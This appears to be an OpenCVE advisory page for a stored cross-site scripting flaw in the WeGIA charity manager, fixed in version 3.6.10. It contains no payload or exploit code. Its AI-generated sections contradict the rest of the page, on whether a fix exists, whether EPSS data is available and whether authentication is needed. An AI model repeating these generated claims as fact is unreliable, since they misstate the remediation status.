Description
WeGIA is a web manager for charitable institutions. In versions prior to 3.6.10, a Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when user access the the page, enabling session hijacking and account takeover. Version 3.6.10 fixes the issue.
Published: 2026-04-17
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Account Takeover
Action: Immediate Patch
AI Analysis

Impact

This vulnerability is a stored cross‑site scripting flaw in the intercorrencia_visualizar.php page. An authenticated user can submit malicious JavaScript that is stored and later executed when anyone views the notification page. The injected script can hijack user sessions and take over accounts, compromising confidentiality and integrity of user credentials.

Affected Systems

The affected product is the WeGIA web manager from LabRedesCefetRJ. Versions prior to 3.6.10 contain the flaw. Users of any earlier releases should verify their installed version.

Risk and Exploitability

The CVSS score of 6.4 places this issue in the medium severity range. EPSS data is unavailable and the vulnerability is not listed in the CISA KEV catalog, indicating no confirmed exploitation at this time. Because the flaw requires authentication, attackers are limited to victims with valid credentials, but once the script is injected, the attacker can hijack sessions of that account and potentially other users who view the page. The likely attack vector is a web‑based authenticated session that submits malicious payloads.

Generated by OpenCVE AI on April 18, 2026 at 17:07 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade WeGIA to version 3.6.10 or later to receive the fix for the stored XSS vulnerability.
  • Limit access to the intercorrencia_visualizar.php page to only privileged users or roles that legitimately need access; disable the page for less trusted users if possible.
  • Apply input sanitization or enforce a strict Content Security Policy on the page to block JavaScript execution until the patch is applied.

Generated by OpenCVE AI on April 18, 2026 at 17:07 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 17 Apr 2026 21:45:00 +0000

Type Values Removed Values Added
First Time appeared Labredescefetrj
Labredescefetrj wegia
Vendors & Products Labredescefetrj
Labredescefetrj wegia

Fri, 17 Apr 2026 20:30:00 +0000

Type Values Removed Values Added
Description WeGIA is a web manager for charitable institutions. In versions prior to 3.6.10, a Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when user access the the page, enabling session hijacking and account takeover. Version 3.6.10 fixes the issue.
Title WeGIA has stored XSS in intercorrencia_visualizar.php
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 6.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H'}

Subscriptions

Labredescefetrj Wegia
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-17T20:23:13.483Z

Reserved: 2026-04-10T20:22:44.035Z

Link: CVE-2026-40282

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-04-17T21:16:34.007

Modified: 2026-04-17T21:16:34.007

Link: CVE-2026-40282

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T17:15:05Z

Weaknesses